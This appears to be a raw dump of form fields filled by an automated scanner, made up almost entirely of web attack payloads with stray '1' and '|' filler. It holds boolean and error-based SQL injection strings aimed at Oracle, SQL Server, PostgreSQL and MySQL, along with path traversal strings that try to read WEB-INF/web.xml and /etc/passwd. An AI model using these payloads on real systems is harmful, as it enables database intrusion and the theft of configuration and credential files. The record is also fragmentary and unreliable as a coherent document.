1 |
1 |
' anD (SELECT upper(XMLType(chr(60)||chr(4)||chr(62)||chr(60)||chr(47)||chr(4)||chr(62))) FROM dual) is not null anD '1'='1 |
|
|
|
1 |
1 |
' anD (SELECT upper(XMLType(chr(60)||chr(85)||chr(62)||chr(60)||chr(47)||chr(85)||chr(62))) FROM dual) is not null anD '1'='1 |
|
|
|
1 |
1 |
../../../../WEB-INF/web.xml |
|
|
|
1 |
|
|
1 |
1 |
' anD CONVERT(int,CHAR(79)+CHAR(59))>=0 anD '1'='1 |
|
|
|
1 |
1 |
' anD CONVERT(int,CHAR(50)+CHAR(54))>=0 anD '1'='1 |
|
|
|
1 |
1 |
../../../WEB-INF/web.xml |
|
|
|
1 |
|
|
1 |
1 |
' anD CAST(CHR(75)::text||CHR(89)::text AS NUMERIC) >= 0 anD '1'='1 |
|
|
|
1 |
1 |
' anD CAST(CHR(57)::text||CHR(49)::text AS NUMERIC) >= 0 anD '1'='1 |
|
|
|
1 |
|
|
1 |
|
|
1 |
1 |
' anD exp(1415)=exp(1415) anD '1'='1 |
|
|
|
1 |
1 |
' anD exp(32)=exp(32) anD '1'='1 |
|
|
|
1 |
|
|
1 |
|
|
1 |
1 |
' RLIKE (SELECT (CASE WHEN (1996=8265) THEN 1 ELSE 0x28 END))-- GSiC |
|
|
|
1 |
1 |
' RLIKE (SELECT (CASE WHEN (9182=9182) THEN 1 ELSE 0x28 END))-- GSiC |
|
|
|
1 |
1 |
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F.%2Fpasswd |
|
|
|
1 |
|
|
|